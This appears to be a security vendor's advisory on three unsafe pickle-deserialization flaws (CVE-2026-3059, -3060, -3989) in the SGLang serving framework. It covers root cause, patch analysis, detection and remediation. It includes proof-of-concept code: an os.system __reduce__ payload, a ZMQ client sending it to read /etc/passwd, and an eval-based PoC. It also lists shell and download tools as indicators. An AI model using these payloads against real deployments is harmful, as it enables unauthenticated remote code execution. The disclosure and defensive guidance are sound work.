Critical RCE Vulnerabilities in SGLang LLM Framework

Quick Overview
CVSS Rationale
What Is SGLang?
Technical Analysis
Affected Versions
Disclosure Timeline
Threat Status
Detection Guidance
Remediation
- Proposed Patch (Unmerged)
- Long-Term Recommendation
The Bigger Picture: Pickle in AI/ML Infrastructure
How Can Orca Help?
Acknowledgments

The Orca Security Research Pod continuously investigates the security posture of widely adopted AI/ML infrastructure. During a focused audit of LLM serving frameworks, I discovered multiple unsafe deserialization vulnerabilities in SGLang, a popular open-source framework for serving large language models and multimodal AI models. These findings were coordinated through CERT/CC (case VU#665416), with additional analysis contributed by CERT/CC vulnerability researcher Christopher Cullen.

Three CVEs have been assigned: CVE-2026-3059, CVE-2026-3060, and CVE-2026-3989. The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network. The third involves insecure deserialization in a crash dump replay utility. At the time of publication, the SGLang maintainers have not responded to coordinated disclosure efforts, and no official patch is available.

Quick Overview

| Attribute | CVE-2026-3059 | CVE-2026-3060 | CVE-2026-3989 |
| --- | --- | --- | --- |
| Component | Multimodal generation ZMQ broker (`scheduler_client.py`) | Disaggregation encoder receiver (`encode_receiver.py`) | Crash dump replay script (`replay_request_dump.py`) |
| CWE | CWE-502 (Deserialization of Untrusted Data) | CWE-502 (Deserialization of Untrusted Data) | CWE-502 (Deserialization of Untrusted Data) |
| CVSS 3.1 | 9.8 Critical | 9.8 Critical | 7.8 High |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Attack Vector | Network | Network | Local |
| Authentication | None | None | None |
| User Interaction | None | None | Required |
| Affected Versions | ≥ 0.5.5 through latest (0.5.9 at time of publication) | All versions with disaggregation module | All versions containing `replay_request_dump.py` |
| Fix Available | No | No | No |

CVSS Rationale

CVE-2026-3059 and CVE-2026-3060 score 9.8 because the ZMQ broker binds to all available network interfaces (tcp://*) by default with zero authentication, and the pickle.loads() call executes immediately on any received payload. An attacker with network access to the exposed port needs nothing else – no credentials, no user interaction, no complex race conditions. The result is full code execution in the context of the SGLang process. This is a textbook unauthenticated network RCE.

Note: The 9.8 base score reflects severity when the affected feature is active. The multimodal generation and disaggregation modules must be explicitly enabled; default text-only SGLang deployments do not expose the vulnerable broker.

CVE-2026-3989 scores 7.8 High (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). While the impact upon execution is the same as the network RCEs – full arbitrary code execution – the attack prerequisites are meaningfully different. This is a debugging utility in a scripts/playground/ directory; exploitation requires an attacker to plant a malicious .pkl file where an operator will manually load it, via write access to a crash dump directory or social engineering. It underscores the systemic nature of unsafe pickle usage throughout the SGLang codebase.
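
To make the two scores reproducible, the sketch below recomputes them from the vectors in the table using the public CVSS v3.1 base-score equations. It only handles scope-unchanged (S:U) vectors, and the function names are illustrative rather than taken from any scoring library.

```python
import math

# CVSS v3.1 metric weights for scope-unchanged vectors (FIRST specification).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """Round up to one decimal place, following the v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Base score for a vector such as 'AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'."""
    m = dict(part.split(":") for part in vector.split("/"))
    if m["S"] != "U":
        raise ValueError("this sketch only handles S:U vectors")
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * PR[m["PR"]] * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))  # 9.8
print(base_score("AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # 7.8
```

The impact sub-score is identical in both cases; the entire gap between 9.8 and 7.8 comes from the exploitability term, where the local attack vector and the required user interaction lower the weights.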

What Is SGLang?

SGLang is an open-source serving framework developed by LMSYS for running large language models and multimodal AI models in production. It supports a wide range of popular models – including Qwen, DeepSeek, Mistral, and Skywork – and provides OpenAI-compatible API endpoints. SGLang is designed for high-throughput, low-latency inference and is used across research labs and production deployments. In most production environments, SGLang runs inside containerized GPU inference infrastructure – Kubernetes pods, Docker containers, or dedicated GPU nodes. Compromising an SGLang instance could expose model weights, inference data, API credentials, GPU workloads, and potentially provide a pivot point into the surrounding cluster environment.

Technical Analysis

Root Cause: Python’s `pickle` on Untrusted Network Data

All three vulnerabilities share a single root cause: the use of Python’s pickle module to deserialize data from untrusted sources.

Python’s own documentation explicitly warns that the pickle module is not secure and should never be used to deserialize untrusted data. The reason is fundamental to how pickle works – a pickle stream doesn’t just encode data, it encodes instructions for reconstructing Python objects. An attacker can craft a pickle payload whose reconstruction instructions include arbitrary function calls, achieving full code execution the moment pickle.loads() runs.

This is not a novel class of vulnerability. The same pattern has led to RCE in other ML serving frameworks, notably CVE-2024-9053 in vLLM and CVE-2025-10164 in a previous SGLang component. The persistence of pickle-based deserialization in ML tooling is a systemic problem, and SGLang’s codebase contains over 20 instances of pickle.loads() across different modules.

How Pickle Deserialization Becomes Code Execution

For readers less familiar with Python internals, it’s worth understanding why pickle.loads() on untrusted data is equivalent to eval().

When Python pickles an object, it stores instructions for how to rebuild that object later. These instructions include which callable to invoke and what arguments to pass. The __reduce__ method on a Python class controls this process – it tells pickle how to “reduce” an object to a reconstructable form. Critically, the callable specified in __reduce__ is not restricted to constructors. It can be any callable, including os.system, subprocess.Popen, or eval.

Here is the core of our proof-of-concept payload:

import os

class RCEPayload:
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        # pickle stores "call os.system(cmd)" as the reconstruction recipe
        return (os.system, (self.cmd,))

When pickle.loads() processes a serialized RCEPayload, it doesn’t reconstruct an RCEPayload instance. Instead, it calls os.system(cmd), executing an arbitrary shell command. The pickle protocol faithfully follows the stored instructions with no sandboxing, no allowlisting, and no type checking.

The serialized payload is just bytes on the wire. There’s nothing in the pickle bytestream that distinguishes “safe data” from “malicious instruction.” From the ZMQ broker’s perspective, it receives bytes, calls pickle.loads(), and execution happens before any application-level validation could occur.
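
The mechanism can be observed safely with a harmless stand-in. The sketch below is not part of the original PoC: it swaps os.system for the built-in len, so loading the pickle merely returns an integer. The second half uses the standard-library pickletools module to list call-related opcodes without executing the stream. That inspection is a triage heuristic under the assumption that the input is a well-formed pickle, not a security boundary; the Demo class and the call_opcodes helper are illustrative names.

```python
import pickle
import pickletools


class Demo:
    """Harmless stand-in: __reduce__ names len() instead of os.system()."""

    def __reduce__(self):
        return (len, ("abc",))


blob = pickle.dumps(Demo())

# Loading does not rebuild a Demo instance; it calls len("abc").
result = pickle.loads(blob)
print(type(result).__name__, result)  # int 3

# Opcodes that import a callable or invoke one while the stream is loaded.
CALL_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
    "NEWOBJ", "NEWOBJ_EX", "BUILD",
}


def call_opcodes(data: bytes) -> set[str]:
    """Return call-related opcode names found, without executing the pickle."""
    return {op.name for op, _arg, _pos in pickletools.genops(data)} & CALL_OPCODES


print(sorted(call_opcodes(blob)))                              # includes REDUCE
print(sorted(call_opcodes(pickle.dumps({"requests": []}))))    # []
```

A plain dictionary of lists and strings needs none of these opcodes, which is why data-only formats can replace pickle for simple request batches.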

CVE-2026-3059: Multimodal Generation Broker – Full Code Flow

To understand the attack surface, we need to trace the complete path from server startup to deserialization.

Step 1: Server Launch

When an operator starts SGLang’s diffusion server:

python -m sglang.multimodal_gen.runtime.launch_server \
    --model-path stabilityai/stable-diffusion-3-medium \
    --port 8000

The FastAPI application lifecycle hook automatically starts the ZMQ broker as a background task:

@asynccontextmanager
async def lifespan(app: FastAPI):
    # ...
    broker_task = asyncio.create_task(run_zeromq_broker(server_args))
    yield
    broker_task.cancel()

The broker starts automatically as part of the application lifecycle when the multimodal server is running.

Step 2: Broker Binds to All Interfaces

The broker opens a ZeroMQ REP socket and binds to tcp://*:{broker_port}:

async def run_zeromq_broker(server_args: ServerArgs):
    ctx = zmq.asyncio.Context()
    socket = ctx.socket(zmq.REP)
    broker_endpoint = f"tcp://*:{server_args.broker_port}"  # ALL interfaces
    socket.bind(broker_endpoint)

The tcp://* binding means the broker listens on all available network interfaces – 127.0.0.1, the machine’s LAN IP, any public IP, and any container/pod network interface. The broker port defaults to http_port + 1. In the launch example above (--port 8000), the broker listens on port 8001. With SGLang’s default HTTP port of 30000, the broker would be on port 30001.

Although broker_host exists as a field in ServerArgs, the original code ignores it and hardcodes the binding to *.
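
Operators who want to check their own exposure can start from the port arithmetic described above. The following is a minimal sketch, assuming the broker port really is the HTTP port plus one in the deployment being checked; both helper names are hypothetical. It performs a plain TCP connect and sends no data.

```python
import socket


def default_broker_port(http_port: int) -> int:
    """Broker port as described above: HTTP port + 1."""
    return http_port + 1


def is_tcp_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


print(default_broker_port(8000))   # 8001
print(default_broker_port(30000))  # 30001
```

Running is_tcp_port_open() from a different machine against the server's LAN or public address, rather than against 127.0.0.1, is what shows whether the broker is reachable from the network.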

Step 3: Direct Deserialization of Network Data

The broker’s main loop receives raw bytes and passes them directly to pickle.loads():

while True:
    try:
        payload = await socket.recv()
        request_batch = pickle.loads(payload)  # <-- RCE here
        logger.info("Broker received an offline job from a client.")
        response_batch = await async_scheduler_client.forward(request_batch)
        await socket.send(pickle.dumps(response_batch))
    except Exception as e:
        logger.error(f"Error in ZMQ Broker: {e}", exc_info=True)
        try:
            await socket.send(pickle.dumps({"status": "error", "message": str(e)}))
        except Exception:
            pass

There are zero security boundaries between socket.recv() and pickle.loads(). No authentication check. No message format validation. No source IP filtering. No TLS. The ZMQ REP socket accepts connections from any source, and the first thing the code does with the received bytes is deserialize them with pickle.

Note also that the exception handler catches the error after the payload has already been deserialized and executed – the except block cannot prevent the RCE, it only handles downstream errors.
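
For contrast, here is what one boundary between recv() and deserialization could look like. This sketch follows the "restricting globals" approach from the Python pickle documentation: an Unpickler subclass whose find_class() refuses every import, so only built-in containers and scalars can be loaded. It is not code from SGLang or from the proposed patch, the class and function names are hypothetical, and a non-pickle format remains the safer choice.

```python
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import any module-level name."""

    def find_class(self, module, name):
        # Called whenever the stream asks for a global such as os.system.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def loads_plain_data(payload: bytes):
    """Load a pickle containing only dicts, lists, strings, numbers, etc."""
    return NoGlobalsUnpickler(io.BytesIO(payload)).load()


class Demo:
    """Benign test object whose __reduce__ names the built-in len()."""

    def __reduce__(self):
        return (len, ("abc",))


print(loads_plain_data(pickle.dumps({"prompt": "a cat", "steps": 20})))

try:
    loads_plain_data(pickle.dumps(Demo()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

The rejection happens before any callable is resolved, which is the property the original loop lacks.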

Step 4: Exploitation

From the attacker’s side, the exploit is minimal – a standard ZMQ REQ socket and a pickle payload:

ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect(f"tcp://{target}:{port}")

payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))
sock.send(payload)

This is a single-message exploit. The attacker connects, sends one ZMQ message, and the command executes. The ZMQ REP/REQ pattern even sends a response back, confirming that the broker processed the message.

CVE-2026-3060: Disaggregation Encoder Receiver

The same pickle deserialization pattern exists in a completely separate component – SGLang’s encoder parallel disaggregation system in encode_receiver.py (lines 202 and 643).

This module is activated when a user passes the --encoder-transfer-backend zmq_to_scheduler flag, enabling ZMQ-based transfer between encoder and scheduler components. Like the multimodal broker, it binds a ZMQ socket to tcp://* and calls pickle.loads() on incoming payloads without authentication.

The attack mechanics are identical to CVE-2026-3059, but the code is maintained by a different team within the SGLang project (@ByronHsu, @hnyls2002, @ShangmingCai). This is worth noting because it means patches – if they ever arrive – may land on different timelines for the two components.
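
Both receivers deserialize before establishing who sent the message. As an illustration of the missing step, the sketch below authenticates a message with an HMAC tag and only releases the body once the tag verifies. It is a generic standard-library pattern, not SGLang code; the seal and open_sealed names are hypothetical, and the sketch assumes a pre-shared key and offers no replay protection. ZeroMQ's own CURVE security mechanism would be another option.

```python
import hashlib
import hmac

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def seal(key: bytes, body: bytes) -> bytes:
    """Prefix the body with an HMAC-SHA256 tag computed over it."""
    return hmac.new(key, body, hashlib.sha256).digest() + body


def open_sealed(key: bytes, message: bytes) -> bytes:
    """Return the body only if its tag verifies; raise ValueError otherwise."""
    tag, body = message[:TAG_LEN], message[TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if len(tag) != TAG_LEN or not hmac.compare_digest(tag, expected):
        raise ValueError("message failed authentication")
    return body


key = b"example-shared-secret"  # placeholder; load from a secret store in practice
wire = seal(key, b'{"requests": []}')
print(open_sealed(key, wire))
```

The receiver would call open_sealed() on the raw bytes first and hand only the verified body to its decoder, so unauthenticated payloads never reach a deserializer.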

CVE-2026-3989: Crash Dump Replay Script

The replay_request_dump.py utility in scripts/playground/ loads .pkl files with pickle.load() and no validation:

def read_records(files):
    records = []
    for f in files:
        tmp = pickle.load(open(f, "rb"))
        if isinstance(tmp, dict) and "requests" in tmp:
            records.extend(tmp["requests"])
        else:
            records.extend(tmp)
    return records

The script is designed to replay crash dumps generated by SGLang when --crash-dump-folder is configured. Here’s the attack scenario in concrete terms:

1. SGLang writes crash dump .pkl files to a configured directory (e.g., /data/sglang_crash_dump/).
2. An attacker with write access to that directory – or who can supply a file via social engineering (“can you replay this crash dump for me?”) – drops a malicious .pkl file.
3. The operator runs: python3 replay_request_dump.py --input-file /data/sglang_crash_dump/malicious.pkl
4. pickle.load() executes the attacker’s payload.

The PoC for this CVE (developed by CERT/CC) uses a payload that returns a valid {'requests': []} structure after executing its code, so the script continues running normally – the operator may not even notice the execution:

class POC:
    def __reduce__(self):
        payload = (
            "(__import__('pathlib').Path('poc_marker.txt').write_text("
            "'pickle payload executed\\n', encoding='utf-8'), {'requests': []})[1]"
        )
        return (eval, (payload,))
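
On the defensive side, an operator can at least refuse dump files that other accounts were able to write. The sketch below is a hypothetical pre-flight check, not part of replay_request_dump.py. It assumes a POSIX system, looks only at the file itself (not at the permissions of its parent directory), and does nothing against a file the operator was talked into copying into place.

```python
import os
import stat


def is_safe_to_load(path: str) -> bool:
    """True if path is a regular file we own that group/others cannot write."""
    st = os.lstat(path)  # lstat: do not follow a symlink planted by someone else
    return (
        stat.S_ISREG(st.st_mode)
        and st.st_uid == os.getuid()
        and not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
    )
```

A replay wrapper could call is_safe_to_load() on every input file and stop with an error instead of unpickling when the check fails.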

Proposed Patch Analysis

As part of the coordinated disclosure, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch with two changes:

Change 1: Localhost binding (effective)

# Original: binds to all interfaces
broker_endpoint = f"tcp://*:{server_args.broker_port}"

# Patched: binds to localhost by default
host = server_args.broker_host or "127.0.0.1"
broker_endpoint = f"tcp://{host}:{server_args.broker_port}"

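With the default changed to 127.0.0.1, the broker is no longer reachable from the network unless an operator explicitly sets broker_host to a routable address. Even if pickle deserialization remains, an attacker would need local access to the machine.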
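
A configuration audit can apply the same idea by classifying endpoint strings. The helper below is an illustrative sketch, not part of the proposed patch: it treats a tcp:// endpoint as local only when the host parses as a loopback address or is the literal name localhost, and treats everything else (including the * wildcard) as exposed.

```python
import ipaddress


def is_loopback_endpoint(endpoint: str) -> bool:
    """True if a 'tcp://host:port' ZMQ endpoint binds to loopback only."""
    scheme, _, rest = endpoint.partition("://")
    if scheme != "tcp":
        raise ValueError(f"unsupported endpoint: {endpoint!r}")
    host, _, _port = rest.rpartition(":")
    host = host.strip("[]")  # allow bracketed IPv6 literals such as [::1]
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # '*', interface names and other hostnames are treated as exposed.
        return False


print(is_loopback_endpoint("tcp://*:8001"))          # False
print(is_loopback_endpoint("tcp://127.0.0.1:8001"))  # True
```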

Change 2: msgpack serialization with pickle fallback (partial)

The patch introduces _pack() / _unpack() functions that prefer msgpack but fall back to pickle:

def _unpack(b: bytes) -> Any:
    try:
        return _from_basic(msgpack.unpackb(b, raw=False))
    except Exception:
        return pickle.loads(b)  # Fallback still vulnerable

This is a pragmatic transition mechanism – it allows existing pickle-speaking components to continue working while new messages use msgpack. However, the fallback means that an attacker who crafts a payload that deliberately fails msgpack parsing (which any valid pickle stream will) still reaches pickle.loads().

With the localhost binding in place, this is a local-only risk and acceptable for a transitional fix. Without the localhost binding, the msgpack wrapper alone would not prevent remote exploitation.
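
For comparison, a decoder without a fallback simply rejects anything it cannot parse. The sketch below uses JSON from the standard library as a stand-in for msgpack so that it runs without extra dependencies; pack and unpack_strict are hypothetical names, not the patch's _pack() / _unpack().

```python
import json
import pickle


def pack(obj) -> bytes:
    """Encode plain data (dicts, lists, strings, numbers) as UTF-8 JSON."""
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def unpack_strict(data: bytes):
    """Decode JSON only; there is deliberately no pickle fallback."""
    try:
        return json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("rejected: not a valid message") from exc


print(unpack_strict(pack({"status": "ok", "requests": []})))

try:
    unpack_strict(pickle.dumps({"status": "ok"}))  # a pickle stream is refused
except ValueError as exc:
    print(exc)
```

The trade-off is compatibility: every peer has to speak the new format before the fallback can be dropped, which is why the proposed patch keeps it during the transition.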

The synchronous SchedulerClient class also still uses send_pyobj() / recv_pyobj() (ZMQ’s built-in pickle-based methods), but these connect to internal scheduler endpoints rather than the exposed broker, making them lower priority.

The real fix: Both changes together are effective as an immediate mitigation. The long-term fix requires replacing all 20+ pickle.loads() instances throughout the codebase with safe serialization – a significant engineering effort that the vendor would need to own.

Attack Flow (CVE-2026-3059 / CVE-2026-3060)

1. The target runs SGLang with multimodal generation or disaggregation features enabled.
2. The ZMQ broker binds to tcp://*:{port}, accessible from the network.
3. The attacker connects to the exposed port and sends a pickle payload containing a malicious __reduce__ method.
4. SGLang calls pickle.loads() on the payload, triggering arbitrary code execution.
5. The attacker has code execution with the full privileges of the SGLang process.

No authentication. No headers. No API keys. Just a raw TCP connection and a pickle bytestream.

Affected Versions

| Component | Introduced | Affected Range | Fixed Version |
| --- | --- | --- | --- |
| `multimodal_gen` (CVE-2026-3059) | Commit `7bc1dae09` (2025-11-05) | ≥ 0.5.5 through latest (0.5.9+) | None |
| Disaggregation module (CVE-2026-3060) | Present in all versions with ZMQ disaggregation | All versions with feature | None |
| `replay_request_dump.py` (CVE-2026-3989) | Present since script creation | All versions | None |

Disclosure Timeline

| Date | Event |
| --- | --- |
| 2026-02-04 | Vulnerability discovered by Igor Stepansky (Orca Security) |
| 2026-02-04 | GitHub Security Advisory (GHSA-3cp7-c6q2-94xr) submitted to SGLang |
| 2026-02-04 | Report submitted to CERT/CC |
| 2026-02-09 | CERT/CC creates case VU#665416; vendor invited |
| 2026-02-09 | PoC files uploaded and validated |
| 2026-02-10 | CERT/CC confirms disclosure date of March 26, 2026 |
| 2026-02-17 | CERT/CC reaches out directly to SGLang maintainers; no response |
| 2026-02-23 | CVE-2026-3059 and CVE-2026-3060 assigned; CERT/CC indicates plans to contact CISA for additional assistance |
| 2026-03-02 | CERT/CC develops proposed patch (msgpack + localhost binding) |
| 2026-03-03 | GHSA-wxjp-55q2-vg27 opened with patch proposal |
| 2026-03-11 | CVE-2026-3989 identified by CERT/CC (Christopher Cullen); CVE assigned |

Despite multiple contact attempts through GitHub Security Advisories and direct email by CERT/CC – including outreach to CISA for assistance – the SGLang maintainers did not respond at any point during the coordination process. No vendor statement was obtained, and no official patch has been released.

Threat Status

Active Exploitation: No exploitation of these specific vulnerabilities has been observed in the wild at the time of publication.

PoC Availability: Functional proof-of-concept code for CVE-2026-3059 and CVE-2026-3060 exists and was shared with CERT/CC during coordination. A PoC for CVE-2026-3989 was developed by CERT/CC. Given the trivial nature of pickle deserialization exploits, weaponization requires minimal effort.

Important context: The multimodal generation and disaggregation features must be explicitly enabled for CVE-2026-3059 and CVE-2026-3060 to be exploitable. Default SGLang text-only inference deployments are not affected by these two CVEs. However, any deployment running multimodal_gen or disaggregation with ZMQ transport is immediately vulnerable if the broker port is network-reachable.

Detection Guidance

Network-level indicators for CVE-2026-3059 / CVE-2026-3060:

- Monitor for unexpected inbound TCP connections to the ZMQ broker port (default: http_port + 1). ZMQ traffic on this port from external or untrusted source IPs is anomalous.
- ZMQ uses a specific wire protocol – a ZMTP handshake followed by message frames. Network IDS signatures for ZMTP on unexpected ports can flag exposure.
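
As a starting point for such a signature, the sketch below matches the fixed bytes at the start of a ZMTP greeting as laid out in the public ZMTP 3.x specification: a 0xFF byte, eight padding bytes, then 0x7F, followed by the major version. The function names are illustrative, and a match on the first bytes of a TCP stream is a hint for further inspection rather than proof of a ZeroMQ peer.

```python
from typing import Optional


def looks_like_zmtp_greeting(data: bytes) -> bool:
    """Match the 10-byte ZMTP signature: 0xFF, 8 padding bytes, 0x7F."""
    return len(data) >= 10 and data[0] == 0xFF and data[9] == 0x7F


def zmtp_major_version(data: bytes) -> Optional[int]:
    """Return the version byte that follows the signature, if present."""
    if looks_like_zmtp_greeting(data) and len(data) >= 11:
        return data[10]
    return None


# Synthetic 64-byte greeting built for illustration (NULL security mechanism).
greeting = (
    b"\xff" + b"\x00" * 7 + b"\x01" + b"\x7f"   # signature
    + b"\x03\x01"                               # version major, minor
    + b"NULL".ljust(20, b"\x00")                # mechanism
    + b"\x00"                                   # as-server flag
    + b"\x00" * 31                              # filler
)
print(looks_like_zmtp_greeting(greeting), zmtp_major_version(greeting))
print(looks_like_zmtp_greeting(b"GET / HTTP/1.1\r\n"))
```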

Host-level indicators:

- Unexpected child processes spawned by the SGLang Python process (e.g., /bin/sh, curl, wget, nc).
- File creation in unusual locations by the SGLang process (e.g., /tmp/pwned, reverse shell scripts).
- Outbound connections from the SGLang process to unexpected destinations.
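
The first indicator can be approximated with a small script over process-table output. This is a rough sketch that assumes the three-column output of `ps -eo pid,ppid,comm`; the name list and the suspicious_children helper are illustrative, and it only inspects direct children of the given PID. A production deployment would more likely rely on an EDR or audit framework.

```python
# Process names that an inference server normally has no reason to spawn.
SUSPICIOUS = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat"}


def suspicious_children(ps_output: str, parent_pid: int) -> list[tuple[int, str]]:
    """Return (pid, name) for direct children of parent_pid with a flagged name."""
    hits = []
    for line in ps_output.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3 or not parts[0].isdigit() or not parts[1].isdigit():
            continue  # skips the header row and malformed lines
        pid, ppid, name = int(parts[0]), int(parts[1]), parts[2].strip()
        if ppid == parent_pid and name in SUSPICIOUS:
            hits.append((pid, name))
    return hits


sample = """  PID  PPID COMMAND
  100     1 python
  101   100 sh
  102   100 python
  103   101 curl
"""
print(suspicious_children(sample, 100))  # [(101, 'sh')]
```

In practice the input string would come from something like subprocess.run(["ps", "-eo", "pid,ppid,comm"], capture_output=True, text=True).stdout, with parent_pid set to the SGLang server's PID.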

Remediation

Immediate actions:

- Network segmentation. Ensure ZMQ broker ports (default: http_port + 1) are not exposed to untrusted networks. Use firewall rules to restrict access to localhost or known internal clients only.
- Review deployment flags. If you are not using multimodal generation or disaggregation features, ensure they are not enabled.
- Audit crash dump handling. Do not run replay_request_dump.py on .pkl files from untrusted sources or shared directories with weak permissions.

Proposed Patch (Unmerged)

As detailed in the Patch Analysis section above, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch that binds the ZMQ broker to localhost by default and replaces pickle with msgpack serialization (with a transitional pickle fallback). This patch has been submitted to the SGLang maintainers via GitHub Security Advisory GHSA-wxjp-55q2-vg27 but has not been merged. Users may apply similar mitigations manually.

Long-Term Recommendation

SGLang’s codebase contains more than 20 instances of pickle.loads() and related unsafe deserialization calls. A comprehensive audit and migration to safe serialization formats (msgpack, JSON, or Protocol Buffers) is necessary to address the systemic risk.
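
An audit of this kind can begin with a syntax-level search. The sketch below uses the standard-library ast module to flag pickle.load(), pickle.loads(), pickle.Unpickler() and pyzmq's recv_pyobj() calls in Python source. It is a starting point under simple assumptions: it misses aliased imports such as `from pickle import loads`, and the find_unsafe_calls name is hypothetical.

```python
import ast

UNSAFE_PICKLE_ATTRS = {"load", "loads", "Unpickler"}
UNSAFE_METHODS = {"recv_pyobj"}  # pyzmq helper that unpickles received data


def find_unsafe_calls(source: str, filename: str = "<string>") -> list[tuple[int, str]]:
    """Return sorted (line, call) pairs for pickle-based deserialization calls."""
    hits = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call) or not isinstance(node.func, ast.Attribute):
            continue
        attr = node.func.attr
        owner = node.func.value
        if isinstance(owner, ast.Name) and owner.id == "pickle" and attr in UNSAFE_PICKLE_ATTRS:
            hits.append((node.lineno, f"pickle.{attr}"))
        elif attr in UNSAFE_METHODS:
            hits.append((node.lineno, attr))
    return sorted(hits)


example = (
    "import pickle, json\n"
    "batch = pickle.loads(payload)\n"
    "reply = sock.recv_pyobj()\n"
    "cfg = json.loads(text)\n"
)
print(find_unsafe_calls(example))  # [(2, 'pickle.loads'), (3, 'recv_pyobj')]
```

Applied to a checkout, the function would be called once per file, for example over pathlib.Path(repo).rglob("*.py"), and each hit reviewed for whether its input can cross a trust boundary.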

The Bigger Picture: Pickle in AI/ML Infrastructure

This is not an isolated finding. Unsafe pickle deserialization is arguably the most prevalent vulnerability class in the Python AI/ML ecosystem. The pattern repeats across model serving frameworks, training pipelines, model registries, and utility scripts.

The reason is understandable: pickle is convenient. It serializes arbitrary Python objects with zero schema definition. For fast-moving ML projects focused on model performance rather than security hardening, pickle is the path of least resistance. But that convenience comes at a cost – every pickle.loads() call on untrusted input is an implicit eval().

Organizations deploying open-source LLM serving infrastructure should audit their dependencies for pickle usage, restrict network access to internal communication endpoints, and treat any pickle deserialization of external data as a critical security boundary.

How Can Orca Help?

The Orca Platform secures AI as an extension of its core capabilities: identifying, prioritizing, and remediating risk across cloud environments. With Orca, customers can:

- build an inventory of AI models, cloud-managed AI services, unmanaged apps, and other self-hosted AI frameworks
- pinpoint where AI models and tools are running
- detect sensitive data on the assets running AI projects, including training or fine-tuning datasets, as well as AI files
- prioritize and remediate AI vulnerabilities and risks to AI workloads

To learn more or see the Orca Platform in action, schedule a personalized 1:1 demo.

Acknowledgments

Igor Stepansky (Orca Security) – vulnerability discovery, PoC development, and coordinated disclosure for CVE-2026-3059 and CVE-2026-3060

Christopher Cullen (CERT/CC) – coordination, patch development, CVE-2026-3989 discovery, and vulnerability note authoring

CERT/CC – case coordination (VU#665416)
